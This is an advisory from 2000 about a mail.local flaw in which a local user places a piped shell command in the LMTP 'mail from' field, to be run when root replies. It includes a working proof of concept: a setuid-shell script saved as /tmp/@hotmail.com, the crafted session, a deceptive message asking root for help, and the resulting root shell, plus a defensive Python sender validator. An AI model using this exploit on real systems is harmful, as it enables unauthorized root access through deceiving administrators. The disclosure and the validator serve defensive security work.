Title: vulnerability in mail.local
Released by: Gregory Duchemin
Date: 1st November 2000
hi,
mail.local is a little setuid root program designed, as its name suggests, for
local mail delivery.
Used with the -l option, it gives an interactive mode speaking the LMTP protocol
(a simplified SMTP for local mail delivery only).
A weakness exists in the 'mail from' field that allows any local user to
insert a piped shell command, which may be executed by the recipient when he
replies with the mail command. A little social engineering skill should help to
root the box.
Finally, mail.local shouldn't allow such escape characters even in the mail from
field, and the mail command shouldn't allow such a reply through a pipe.
A space character in the command will terminate the string, so either use a
single command like '|reboot' or use a comma, which should be converted to a
space by mail.
e.g.: '|shutdown,now'
Linux 2.4.0 beta Caldera, which was freely distributed during defcon 00, is
vulnerable to this problem.
That looks like the old sendmail bugs.
Nostalgia.
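The check the advisory calls for (mail.local refusing shell escape characters in the 'mail from' field), as an added Python example that is not part of the advisory or of mail.local: it parses an LMTP MAIL FROM line and rejects a reverse-path carrying a pipe or other shell metacharacters, or a comma that the mail command would turn into a space. The policy is an assumption, deliberately stricter than RFC 5321's address grammar, and the sample commands are constructed after the transcript below.

```python
import re

# Constructed LMTP command lines, modelled on the transcript in this advisory
# (the two "|..." senders are the shape of address the advisory describes).
SAMPLE_COMMANDS = [
    "MAIL FROM:<alice@example.org>",
    "MAIL FROM:<>",
    "mail from:<|/tmp/@hotmail.com>",
    "mail from:<|shutdown,now>",
    "MAIL FROM:<bob@example.org> BODY=8BITMIME",
    "RCPT TO:<root>",
]

# Assumed policy, stricter than RFC 5321 (whose atext allows '|', '$', '`' ...):
# a local delivery agent only needs plain local@domain reverse-paths, so anything
# a shell or a mail(1) reply could interpret is refused outright.
LOCAL_PART_RE = re.compile(r'^[A-Za-z0-9][A-Za-z0-9._+-]*$')
DOMAIN_RE = re.compile(
    r'^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?'
    r'(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)+$')
SHELL_METACHARACTERS = set('|;&$`<>\\\'"\n\r \t')
MAIL_FROM_RE = re.compile(r'^MAIL\s+FROM:\s*<(?P<path>[^>]*)>', re.IGNORECASE)


def check_mail_from(line):
    """Return (accepted, reason) for one LMTP MAIL FROM command line."""
    m = MAIL_FROM_RE.match(line.strip())
    if not m:
        return False, "syntax: expected MAIL FROM:<reverse-path>"
    path = m.group("path")
    if path == "":
        return True, "null reverse-path"  # bounces legitimately use MAIL FROM:<>
    bad = "".join(sorted(set(path) & SHELL_METACHARACTERS))
    if bad:
        # This is the check that catches a "|/tmp/..." sender before it is
        # stored in the From line that the recipient's reply would act on.
        return False, "shell metacharacter(s) in reverse-path: %r" % bad
    local, sep, domain = path.rpartition("@")
    if not sep:
        local, domain = path, None  # bare local user, no domain part
    if not LOCAL_PART_RE.match(local):
        return False, "local part is not a plain dot-atom"  # also rejects ','
    if domain is not None and not DOMAIN_RE.match(domain):
        return False, "domain is not a plain hostname"
    return True, "ok"


def rejected_senders(commands):
    """Filter a session's MAIL FROM lines down to those the policy refuses."""
    return [c for c in commands
            if c.upper().lstrip().startswith("MAIL FROM")
            and not check_mail_from(c)[0]]
```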
=======
#cat exploit
#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
#id
#uid=666(c3rb3r) gid=100(user)
#
#cp exploit /tmp/@hotmail.com
#chmod a+x /tmp/@hotmail.com
#mail.local -l
....
mail from:<|/tmp/@hotmail.com>    (you can use many senders to hide the evil string)
rcpt to:
data
Subject:I have a problem
I need higher privilege on this machine, can u do something for me please ?
thanx.
c3rb3r
.
quit
.....
(now wait for a reply and then, )
#ls /tmp
@hotmail.com
newsh
#/tmp/newsh
#id
#uid=0(root) gid=0(root)
#echo 'very nice, thanx a lot' | mail -s 'thanx' root    // with thanks
Have a nice day,
Gregory Duchemin
Security consultant
1001 bd Maisonneuve Ouest, suite 200
Montreal (Quebec) H3A 3C8 CANADA
c3rb3r@hotmail.com